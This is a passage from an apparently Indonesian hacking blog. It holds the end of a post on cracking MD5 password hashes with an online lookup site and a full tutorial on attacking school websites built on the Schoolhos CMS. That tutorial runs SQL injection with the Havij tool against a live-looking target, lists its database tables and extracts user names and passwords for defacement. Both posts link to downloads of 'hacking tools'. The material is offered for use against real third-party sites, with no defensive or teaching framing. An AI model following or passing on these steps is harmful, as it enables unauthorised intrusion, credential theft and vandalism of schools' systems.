Cara Descrypt Hash MD5 Online Work 100%


2. Tampilan utama seperti ini, coba kalian Copy Hash MD5nya, lalu Paste disitu, lihat tanda panah.

Cara Descrypt Hash MD5 Online Work 100%
Cara Descrypt Hash MD5 Online Work 100%


3. Habis itu langsung ketik Capthanya jangan kelamaan nnti suruh ngulang, hhh

Cara Descrypt Hash MD5 Online Work 100%
Cara Descrypt Hash MD5 Online Work 100%


4. habis isi captha langsung klik Submit, dan lihatlah, password sudah muncul :D

Cara Descrypt Hash MD5 Online Work 100%
Cara Descrypt Hash MD5 Online Work 100%

Udah gitu doang tutorialnya, kgx usah ribet-ribetlah yahh, yg penting ngerti hhh

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Deface Website Schoolhos Terbaru 2017 100%

Deface Website Schoolhos Terbaru 2017 100%


Oke selamat pagee selamat hari Kemerdekaan Republik Indonesia, Dirgahayu ke 72, oke ditemani Mentari 17 Agustus saya akan membagikan tutorial yg sangat mudah sekali, tutor Script Kiddie yaitu Mencari User dan Password di CMS Schoolhos dengan memanfaatkan Bug SQL dengan Exploit Havij.

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


Langkah - langkah Mencari Username dan Password


Berikut ini langkah-langkah coli yang benar :D
Sebelumnya jika menggunakan Chrome coba tekan [ CTRL-SHIFT-N ]

1. Pertama Cari Targetnya Terlebih dahulu, ini saya uda punya target :v jadi gx perlu nyari :v

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


2. Setelah websitenya terbuka, klik Menu Profil dan pilih salah satu Sub Menunya, disini saya akan SQL Injection pada Menu Struktur Organisasi.

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


3. Kemudian Copy Link-nya.

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


4. Buka Havij Portablenya, extrak saja lalu hasil extrak klik kanan dan Run Administrator biar bebas tanpa aturan :v

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


5. Jika sudah terbuka Paste link yang tadi di Text Box Target.

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


6. Jika sudah di paste, langsung saja klik Analyze, jangan lupa berdoa terlebih dahulu.

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work

Keterangan :
1. Keyword Found : STRUKTUR
2. Current DB : smangedo_5g3D  (ini adalah nama databasenya)

7. OK dari kesimvulan diatas, langsung ente klik menu Get Tables, dan liat tablenya ada banyak cekalieehh :v

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


8. Setelah Tablenya muncul semua, ente klik / Ceklis Table Users seperti dibawah ini :v, habis iku klik Get Columns, dan akan muncul columns lihat dengan jelast :D

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work


9. Kalau Columns sudah muncul kini saatnya tahap akhir di Havij yaitu mencari datanya, oke masih di Table Users, pilih dan ceklist Columns [ namausers dan sandiusers ] seperti gambar ini, lalu klik menu Get Data, tunggu beberapa detik maka akan muncul noh namausers dan sandiusersnya.

Deface Website Sekolah Dengan Havij 2017 100% Work
Deface Website Sekolah Dengan Havij 2017 100% Work

Jika sudah berhasil mendapatkan User dan Pass, kita save saja dulu dengan klik menu Save Data.
Semoga bermanfaat, dan berguna bagi nusa dan bangsa :D

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...
 
Copyright © 2014 Abdur Rozak. Designed by OddThemes